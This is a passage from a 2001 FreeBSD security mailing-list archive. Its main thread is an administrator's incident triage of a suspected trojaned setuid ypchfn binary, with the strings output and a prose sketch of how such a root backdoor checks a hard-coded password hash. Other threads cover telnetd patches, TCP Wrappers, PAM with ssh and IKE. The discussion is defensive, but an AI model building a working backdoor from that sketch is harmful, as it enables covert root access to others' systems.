'trojaned' ypchfn (that is, a ypchfn with extra feature(s) giving root access) but rather a totally new program, rather short, which executable has been somehow "padded" to have the length equal to that of the original ypchfn. Two things seem weird to me here: 1. If it _replaces_ root password, how would the future usage of it by the intruder go undetected? Backdoors should be possibly untraceable I guess. 2. What if ypchfn is run by an unsuspecting user in a good will attempt to change her finger information? She locks out root? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 16:59:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (Postfix) with ESMTP id 0F77137B406 for ; Tue, 24 Jul 2001 16:59:15 -0700 (PDT) (envelope-from danderse@cs.utah.edu) Received: from faith.cs.utah.edu (faith.cs.utah.edu [155.99.198.108]) by wrath.cs.utah.edu (8.11.1/8.11.1) with ESMTP id f6ONxAX18969; Tue, 24 Jul 2001 17:59:10 -0600 (MDT) From: David G Andersen Received: (from danderse@localhost) by faith.cs.utah.edu (8.11.1/8.11.1) id f6ONx9U09628; Tue, 24 Jul 2001 17:59:09 -0600 (MDT) Message-Id: <200107242359.f6ONx9U09628@faith.cs.utah.edu> Subject: Re: Security Check Diffs Question To: kzaraska@student.uci.agh.edu.pl (Krzysztof Zaraska) Date: Tue, 24 Jul 2001 17:59:09 -0600 (MDT) Cc: roam@orbitel.bg (Peter Pentchev), jdl@jdl.com (Jon Loeliger), security@FreeBSD.ORG In-Reply-To: from "Krzysztof Zaraska" at Jul 25, 2001 01:47:25 AM X-Mailer: ELM [version 2.5 PL2] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Lo and behold, Krzysztof Zaraska once said: > > Driven by curiousity I've just done strings /usr/bin/ypchfn on my > 4.3-RELEASE machine and got the output which is 346 lines long. So it > seems to me that this binary is not a 'trojaned' ypchfn (that is, a ypchfn > with extra feature(s) giving root access) but rather a totally new > program, rather short, which executable has been somehow "padded" to have > the length equal to that of the original ypchfn. Two things seem weird to > me here: > > 1. If it _replaces_ root password, how would the future usage of it by the > intruder go undetected? Backdoors should be possibly untraceable I guess. It's probably not what you think. > 2. What if ypchfn is run by an unsuspecting user in a good will attempt to > change her finger information? She locks out root? ypchfn is not used to change root's password, especially since almost nobody uses YP for disting out root's password (hint: this would be exceptionally stupid). It's probably a simple trojan with a pretty interface on it that says, (if username == "root", ask for their password. If crypt(input) == that stored password, grant access to the system). If it's clever, it'd shell out to the real ypchfn if that failed. Kind of like a trojaned login binary. A teensy bit of gdb'ing could probably determine if this is correct or not. -Dave -- work: dga@lcs.mit.edu me: dga@pobox.com MIT Laboratory for Computer Science http://www.angio.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 17: 0:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id 1A2B437B40F; Tue, 24 Jul 2001 17:00:00 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 733FA66E04; Tue, 24 Jul 2001 16:59:58 -0700 (PDT) Date: Tue, 24 Jul 2001 16:59:58 -0700 From: Kris Kennaway To: Simon Gibson Cc: "'security-officer@FreeBSD.org'" , security@FreeBSD.org Subject: SA-01:49 patches/packages (Re: ftp.freebsd.org) Message-ID: <20010724165957.A38506@xor.obsecurity.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="ZPt4rx8FFjLCG7dd" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from simon@spinner.com on Tue, Jul 24, 2001 at 04:19:17PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --ZPt4rx8FFjLCG7dd Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jul 24, 2001 at 04:19:17PM -0700, Simon Gibson wrote: > On 7/24/01 @ 16:00 PST I see ftp.freebsd.org looks up as >=20 > Name: ftp.beastie.tdk.net > Address: 62.243.72.50 > Aliases: ftp.freebsd.org >=20 > I would like to obtain the FreeBSD-SA-01:49.telnetd.asc patch. > I have not been able to get it from mirrors. >=20 > Please confirm ftp.beastie.tdk.net is your official site. Yes, but annoyingly it seems to have been down most of the day. I'll put up copies of the patches and packages at http://www.freebsd.org/~kris/SA-01:49/ in a few minutes until we can figure out what happened to the site. Kris --ZPt4rx8FFjLCG7dd Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7Xgv8Wry0BWjoQKURAthAAKDTjm7yl1N8Bw/r307NvCAkwOMdggCeKbRf UwF2rAKXLJ++/KdX/wODot4= =p6hb -----END PGP SIGNATURE----- --ZPt4rx8FFjLCG7dd-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 17:10:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id ACC2937B401; Tue, 24 Jul 2001 17:10:09 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id D6A316722A; Tue, 24 Jul 2001 17:10:08 -0700 (PDT) Date: Tue, 24 Jul 2001 17:10:07 -0700 From: Kris Kennaway To: Kris Kennaway Cc: Simon Gibson , "'security-officer@FreeBSD.org'" , security@FreeBSD.org Subject: Re: SA-01:49 patches/packages (Re: ftp.freebsd.org) Message-ID: <20010724171007.A38725@xor.obsecurity.org> References: <20010724165957.A38506@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="GvXjxJ+pjyke8COw" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010724165957.A38506@xor.obsecurity.org>; from kris@obsecurity.org on Tue, Jul 24, 2001 at 04:59:58PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --GvXjxJ+pjyke8COw Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jul 24, 2001 at 04:59:58PM -0700, Kris Kennaway wrote: > On Tue, Jul 24, 2001 at 04:19:17PM -0700, Simon Gibson wrote: > > On 7/24/01 @ 16:00 PST I see ftp.freebsd.org looks up as > >=20 > > Name: ftp.beastie.tdk.net > > Address: 62.243.72.50 > > Aliases: ftp.freebsd.org > >=20 > > I would like to obtain the FreeBSD-SA-01:49.telnetd.asc patch. > > I have not been able to get it from mirrors. > >=20 > > Please confirm ftp.beastie.tdk.net is your official site. >=20 > Yes, but annoyingly it seems to have been down most of the day. I'll > put up copies of the patches and packages at >=20 > http://www.freebsd.org/~kris/SA-01:49/ >=20 > in a few minutes until we can figure out what happened to the site. Actually, you can just use a ftp mirror site (ftp2, ftp3, etc). Most of them seem to have the bits. Kris --GvXjxJ+pjyke8COw Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7Xg5fWry0BWjoQKURAgESAJ9ywWZEdi6uXFzvAYB2Gjyyo+9wVgCaA7CX oUIcC6nfW+hzdUuF14HTL6w= =JsO4 -----END PGP SIGNATURE----- --GvXjxJ+pjyke8COw-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 17:33:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from chrome.jdl.com (chrome.jdl.com [209.39.144.2]) by hub.freebsd.org (Postfix) with ESMTP id 66E6637B401 for ; Tue, 24 Jul 2001 17:33:23 -0700 (PDT) (envelope-from jdl@chrome.jdl.com) Received: from chrome.jdl.com (localhost [127.0.0.1]) by chrome.jdl.com (8.9.1/8.9.1) with ESMTP id TAA07176; Tue, 24 Jul 2001 19:38:10 -0500 (CDT) (envelope-from jdl@chrome.jdl.com) Message-Id: <200107250038.TAA07176@chrome.jdl.com> To: Kris Kennaway Cc: Peter Pentchev , security@freebsd.org Subject: Re: Security Check Diffs Question In-reply-to: Your message of "Tue, 24 Jul 2001 15:47:11 PDT." <20010724154711.B36368@xor.obsecurity.org> Clarity-Index: null Threat-Level: none Software-Engineering-Dead-Seriousness: There's no excuse for unreadable code. Net-thought: If you meet the Buddha on the net, put him in your Kill file. Date: Tue, 24 Jul 2001 19:38:10 -0500 From: Jon Loeliger Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org So, like Kris Kennaway was saying to me just the other day: > > > ypchfn changed its inode number, and its link count. This means that > > somebody performed an unlink() (delete) on ypchfn, and then created > > a new ypchfn with the same size, timestamp, permissions and stuff, > > but still a new file - and that's where the hardlink count + inum > > tracking of /etc/security kicked in and alerted you. > > This is a signature I've seen before; chances are someone has gained > root on your machine (probably through telnetd) Excellent. So given the grim situation, this is what I want to hear. The system was compromised. My suspicion is that telnetd was the culprit, given it came on the heals of the telnet Security announcement. No, I hadn't fixed it yet. Man, there just isn't enough time in the day to do your real job _and_ plug the security holes! :-( So the machine is currently off the air. I'll rebuild it. And would that be 4.4 or 4.3? Rats. I'm also going to set up a more serious DMZ firewall. Can I ask you guys questions and hold my hand through setting it all up? I am not familiar with IPFW, but I know what it does, how it works, networking and IP details. So here's what I think I want to set up now: - External ISP ISDN wire comes out of the wall, - Hits the Ascend Pipeline-50 and comes out ethernet, - Goes into a DMZ box on one ether card, - Same DMZ box has IPFW rules allowing traffic (or not) to be forwarded to the second ether card in that box, - The second ether card plugs into the 24-port switch, - Everything else on the "inside" plugs into that same switch. For starters, do I have the basic scheme right? ( So I'm waiting on the high speed link to come up again, and eventually the Pipe-50 gets replaced with a T-1 LMC card. (Does FreeBSD have an LMC T-1 driver? Or will I have to use this old POS Linux box for that?) ) You know, this is a pain! But I appreciate your suggestions! :-) jdl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 21: 7:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.siat.ru (ns.siat.ru [195.239.171.34]) by hub.freebsd.org (Postfix) with ESMTP id 5C68337B401 for ; Tue, 24 Jul 2001 21:07:17 -0700 (PDT) (envelope-from slava@siat.ru) Received: from siat.ru (slava.siat.ru [195.239.171.36]) by ns.siat.ru (8.11.3/8.11.3) with ESMTP id f6P475420676; Wed, 25 Jul 2001 12:07:05 +0800 (KRSS) Message-ID: <3B5E45F5.22975254@siat.ru> Date: Wed, 25 Jul 2001 12:07:17 +0800 From: "Viacheslav E.Voytovich" Reply-To: slava@siat.ru Organization: Siat Travel X-Mailer: Mozilla 4.72 [en] (X11; U; Linux 2.2.14-6.1.1 i586) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: security@FreeBSD.org Subject: Re: SA-01:49 patches/packages (Re: ftp.freebsd.org) References: <20010724165957.A38506@xor.obsecurity.org> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Kris Kennaway wrote: > > On Tue, Jul 24, 2001 at 04:19:17PM -0700, Simon Gibson wrote: > > On 7/24/01 @ 16:00 PST I see ftp.freebsd.org looks up as > > > > Name: ftp.beastie.tdk.net > > Address: 62.243.72.50 > > Aliases: ftp.freebsd.org > > > > I would like to obtain the FreeBSD-SA-01:49.telnetd.asc patch. > > I have not been able to get it from mirrors. > > > > Please confirm ftp.beastie.tdk.net is your official site. > > Yes, but annoyingly it seems to have been down most of the day. I'll > put up copies of the patches and packages at > > http://www.freebsd.org/~kris/SA-01:49/ > > in a few minutes until we can figure out what happened to the site. > > Kris > > ------------------------------------------------------------------------ > Part 1.2Type: application/pgp-signature Hello !!! Maybe someone tell me where I can take the patch for telnet in FreeBSD 2.2.8? In list I didn't find a answer for this question. Viacheslav Voytovich To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 21:58:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from web10007.mail.yahoo.com (web10007.mail.yahoo.com [216.136.130.43]) by hub.freebsd.org (Postfix) with SMTP id 9D18937B401 for ; Tue, 24 Jul 2001 21:58:45 -0700 (PDT) (envelope-from thiamwah@yahoo.com) Message-ID: <20010725045845.40608.qmail@web10007.mail.yahoo.com> Received: from [161.142.100.81] by web10007.mail.yahoo.com; Tue, 24 Jul 2001 21:58:45 PDT Date: Tue, 24 Jul 2001 21:58:45 -0700 (PDT) From: David Chong Subject: TCP Wrappers and Inetd To: freebsd-security@FreeBSD.ORG MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org dear guys, I understand that TCP Wrappers in included when you install Freebsd and it already provides protection without the need to modify inetd.conf to use "tcpd" for the services you wish to secure. My question is: does it just cover services in inetd (just like tcp wrappers for other unixes) or does it cover more than that in FreeBSD? Like standalone daemons ie. sendmail, httpd, sshd. Thanks __________________________________________________ Do You Yahoo!? Make international calls for as low as $.04/minute with Yahoo! Messenger http://phonecard.yahoo.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 22:18:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from pegasus.cc.ucf.edu (Pegasus.cc.ucf.edu [132.170.240.30]) by hub.freebsd.org (Postfix) with ESMTP id DDA0B37B403 for ; Tue, 24 Jul 2001 22:18:39 -0700 (PDT) (envelope-from ewayte@pegasus.cc.ucf.edu) Received: from pegasus.cc.ucf.edu (pegasus.cc.ucf.edu [132.170.240.30]) Ident [ewayte] by pegasus.cc.ucf.edu (Postfix) with ESMTP id 8ED533785; Wed, 25 Jul 2001 01:18:33 -0400 (EDT) Date: Wed, 25 Jul 2001 01:18:32 -0400 (EDT) From: Eric Wayte To: Cc: Subject: Re: Security Check Diffs Question In-Reply-To: <200107242341.f6ONfpi99078@cdrrdslgw2poolA156.cdrr.uswest.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org An excellent idea! Our sysadmin has done this for all of our Solaris servers (production and development). Eric Wayte University DBA Univ. of Central Florida ewayte@pegasus.cc.ucf.edu On Tue, 24 Jul 2001, Dean M. Phillips wrote: > > For mission-critical servers, I prefer to use tripwire. Burn the binary > and the database onto a CDROM and it will be nearly tamper-proof. > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 24 23:37:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from pa169.kurdwanowa.sdi.tpnet.pl (pa169.kurdwanowa.sdi.tpnet.pl [213.77.148.169]) by hub.freebsd.org (Postfix) with ESMTP id 4448C37B406 for ; Tue, 24 Jul 2001 23:37:01 -0700 (PDT) (envelope-from kzaraska@student.uci.agh.edu.pl) Received: by pa169.kurdwanowa.sdi.tpnet.pl (Postfix, from userid 1001) id 973D41C67; Wed, 25 Jul 2001 08:36:32 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by pa169.kurdwanowa.sdi.tpnet.pl (Postfix) with ESMTP id 41F335475; Wed, 25 Jul 2001 08:36:32 +0200 (CEST) Date: Wed, 25 Jul 2001 08:36:31 +0200 (CEST) From: Krzysztof Zaraska X-Sender: kzaraska@lhotse.zaraska.dhs.org To: David G Andersen Cc: Peter Pentchev , Jon Loeliger , security@FreeBSD.ORG Subject: Re: Security Check Diffs Question In-Reply-To: <200107242359.f6ONx9U09628@faith.cs.utah.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 24 Jul 2001, David G Andersen wrote: > It's probably a simple trojan with a pretty interface on it that > says, (if username == "root", ask for their password. If crypt(input) == > that stored password, grant access to the system). I agree that this is the way this thing should work, but I was wondering: I string original ypchfn and I see a bunch of lines like "no uid for %s" resembling arguments for printf() so I guess that is ypchfn's user interface. But in this trojan I can't see neither these lines nor something resembling a path to the original ypchfn. So, my question is: how does it masquerade to the user as original ypchfn not having it's user interface inside? Or, maybe, the trojan contains ypchfn-like user interface but it cannot be seen with by running strings on it? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 1:20: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id 9BEA337B401 for ; Wed, 25 Jul 2001 01:20:01 -0700 (PDT) (envelope-from str@giganda.komkon.org) Received: (from str@localhost) by giganda.komkon.org (8.11.3/8.11.3) id f6P8Jt715529 for security@freebsd.org; Wed, 25 Jul 2001 04:19:55 -0400 (EDT) (envelope-from str) Date: Wed, 25 Jul 2001 04:19:55 -0400 (EDT) From: Igor Roshchin Message-Id: <200107250819.f6P8Jt715529@giganda.komkon.org> To: security@freebsd.org Subject: sshd, pam and password expiration Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I ran into the following problem: FreeBSD 4.3-RELEASE box. If a user has the password expired (non-zero corresponding field in /etc/master.passwd), then upon login via ssh (using a ssh2 client) the following happens: depending on the client: Unix ssh2 client: (e.g. SSH Secure Shell 2.3.0 (non-commercial version)) Upon login, the following message appears: Authentication successful. Warning: Your password has expired, please change it now And then the connection freezes up, while the log is filled with thousands per second messages: Jul 25 04:03:51 HOST sshd[15221]: PAM pam_chauthtok failed[6]: Permission denied Jul 25 04:03:51 HOST giganda sshd[15221]: no modules loaded for `sshd' service /etc/pam.conf has the following lines relevant to ssh: sshd auth sufficient pam_skey.so sshd auth required pam_unix.so try_first_pass sshd session required pam_permit.so csshd auth required pam_skey.so If a Windows-based ssh.com's ssh is used the user gets the message: Server responded "No further authentication methods available". and nothing else happens. There are no problems if the connection is via ssh1 client, or if the password is not expired. Questions: 1. What is the reason and what is misconfigured ? 2. Where can I read a nice description of pam authentication ? Thanks, Igor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 3: 0:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from web13308.mail.yahoo.com (web13308.mail.yahoo.com [216.136.175.44]) by hub.freebsd.org (Postfix) with SMTP id 03FF137B401 for ; Wed, 25 Jul 2001 03:00:14 -0700 (PDT) (envelope-from ewancarr@yahoo.com) Message-ID: <20010725100013.15001.qmail@web13308.mail.yahoo.com> Received: from [158.234.10.144] by web13308.mail.yahoo.com; Wed, 25 Jul 2001 11:00:13 BST Date: Wed, 25 Jul 2001 11:00:13 +0100 (BST) From: =?iso-8859-1?q?Ewan=20Carr?= Subject: IKE/Racoon To: FreeBSD-Security@FreeBSD.ORG MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Can anyone clear up an ambiguity (in my mind anyway) in RFC2409 (IKE). Say you are using a pre-shared key for authentication in Phase 1 negotiations. RFC 2409 says that the SKEYID value for authentication is calculated thus.. For signatures: SKEYID = prf(Ni_b | Nr_b, g^xy) ..... For pre-shared: SKEYID = prf(pre-shared, Ni_b | Nr_b) where g^xy is the DH-generated shared key. and N* are the nonce values The value SKEYID_A is then calculated from prf(SKEYID,SKEYID_d | g^xy | CKY-I | CKY-R | 1) (SKEYID_d is just anothe generated from SKEYID, the cookies and the diffe-hellman shared secret) What I dont understand is why for the pre-shared key method of authentication you need to generate this additional diffe hellman shared key. Does this actually happen or is the 'formula' above just confusing.. Ta, Ewan ____________________________________________________________ Do You Yahoo!? Get your free @yahoo.co.uk address at http://mail.yahoo.co.uk or your free @yahoo.ie address at http://mail.yahoo.ie To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 3:12:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id 594CE37B405 for ; Wed, 25 Jul 2001 03:12:46 -0700 (PDT) (envelope-from sheldonh@starjuice.net) Received: from sheldonh (helo=axl.seasidesoftware.co.za) by axl.seasidesoftware.co.za with local-esmtp (Exim 3.31 #1) id 15PLfe-000PDR-00; Wed, 25 Jul 2001 12:13:38 +0200 From: Sheldon Hearn To: David Chong Cc: freebsd-security@FreeBSD.ORG Subject: Re: TCP Wrappers and Inetd In-reply-to: Your message of "Tue, 24 Jul 2001 21:58:45 MST." <20010725045845.40608.qmail@web10007.mail.yahoo.com> Date: Wed, 25 Jul 2001 12:13:38 +0200 Message-ID: <96932.996056018@axl.seasidesoftware.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 24 Jul 2001 21:58:45 MST, David Chong wrote: > My question is: does it just cover services in inetd > (just like tcp wrappers for other unixes) or does it > cover more than that in FreeBSD? Like standalone > daemons ie. sendmail, httpd, sshd. Any service launched by inetd will be subject to TCP Wrappers if inetd is started with the -w option (default installation). You will need to check the documentation of any other services. A quick check is to use the ldd utility to check whether the binaries for the services are linked against lwrap. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 4:13: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from mine.kame.net (kame195.kame.net [203.178.141.195]) by hub.freebsd.org (Postfix) with ESMTP id D7CF037B40E for ; Wed, 25 Jul 2001 04:11:09 -0700 (PDT) (envelope-from sakane@kame.net) Received: from localhost ([3ffe:501:4819:1000:260:1dff:fe1e:f7d4]) by mine.kame.net (8.11.1/3.7W) with ESMTP id f6PBGYY50269; Wed, 25 Jul 2001 20:16:34 +0900 (JST) To: ewancarr@yahoo.com Cc: FreeBSD-Security@FreeBSD.ORG Subject: Re: IKE/Racoon In-Reply-To: Your message of "Wed, 25 Jul 2001 11:00:13 +0100 (BST)" <20010725100013.15001.qmail@web13308.mail.yahoo.com> References: <20010725100013.15001.qmail@web13308.mail.yahoo.com> X-Mailer: Cue version 0.6 (010413-1707/sakane) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Message-Id: <20010725201105W.sakane@kame.net> Date: Wed, 25 Jul 2001 20:11:05 +0900 From: Shoichi Sakane X-Dispatcher: imput version 20000228(IM140) Lines: 12 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ipsec wg's mailing list is suitable for asking this question. > What I dont understand is why for the pre-shared > key method of authentication you need to generate > this additional diffe hellman shared key. Does this > actually happen or is the 'formula' above just > confusing.. pre-shared key is just the one of material for authentication. IKE daemon mixes it with the shared secret of DH. the shared secret of DH is generated in each phase 1 exchange. so the mixing of them makes the decipherment attack difficult. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 6:57:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (unknown [198.92.199.5]) by hub.freebsd.org (Postfix) with ESMTP id D360D37B422 for ; Wed, 25 Jul 2001 06:56:15 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.4/8.11.4) with ESMTP id f6OHm3Q45161; Tue, 24 Jul 2001 13:48:07 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Tue, 24 Jul 2001 13:47:58 -0400 (EDT) From: Rob Simmons To: Jon Loeliger Cc: Subject: Re: Security Check Diffs Question In-Reply-To: <200107241632.LAA05639@chrome.jdl.com> Message-ID: <20010724134421.I44940-100000@mail.wlcg.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 If you have access to the same binaries on another machine, run ident against both. If there are _no_ RCS keyword strings in the questionable binaries, there is definitely a problem. Robert Simmons Systems Administrator http://www.wlcg.com/ On Tue, 24 Jul 2001, Jon Loeliger wrote: > Hi Folks, > > This morning, on a machine that's been up for 33 days, > I suddenly saw these /etc/security diffs: > > setuid diffs: > 20,22c20,22 > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh > --- > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chfn > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chpass > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/chsh > 53,55c53,55 > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass > < 8047 -r-sr-xr-x 6 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh > --- > > 8270 -r-sr-xr-x 1 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchfn > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchpass > > 8047 -r-sr-xr-x 5 root wheel 32184 Nov 20 06:01:52 2000 /usr/bin/ypchsh > > > So, how paranoid am I here? How concerned am I? > What compromised of my system just took place? > Couple things to notice: > > - The files now take fewer 512K blocks, > but their sizes are the same? > > - Most of the inodes staid the same. Exact same. > Are these hard linked files? Should be, right? > > - The inode for ypchfn changed! > It's no longer hard linked, right? > > No form of disk restructuring, fsck, defrag, etc, was initiated by me. > > Note that: > > www 181 # cmp /usr/bin/{ypchpass,ypchfn} > /usr/bin/ypchpass /usr/bin/ypchfn differ: char 25, line 1 > > Here is a `strings /usr/bin/ypchfn`: > > www 182 # strings /usr/bin/ypchfn > /usr/libexec/ld-elf.so.1 > FreeBSD > libcrypt.so.2 > _DYNAMIC > _init > __deregister_frame_info > crypt > strcmp > _fini > _GLOBAL_OFFSET_TABLE_ > __register_frame_info > libc.so.4 > strerror > execl > environ > fprintf > __progname > __error > setgid > __sF > execv > getpwuid > getpwnam > atexit > exit > strchr > execvp > setuid > _etext > _edata > __bss_start > _end > 8/u > QR2cc.wsLFbKU > root > > If someone didn't hack my system, I took a disk hit and lost > part of that file, right? > > What other log files am I disecting or where else am I poking > for further evidence? > > Am I blowing away the bogus(?) /usr/bin/ypchfn and re-making > it a hard link to the others again? > > jdl > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7XbTTv8Bofna59hYRA/qmAJ94c+qf42IHuHEzpc9XTomFyoE02ACgpD2V 0paUeTayTHx4/WC6YDwkWxQ= =yz9c -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 7:18:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (unknown [198.92.199.5]) by hub.freebsd.org (Postfix) with ESMTP id D360D37B422 for ; Wed, 25 Jul 2001 06:56:15 -0700 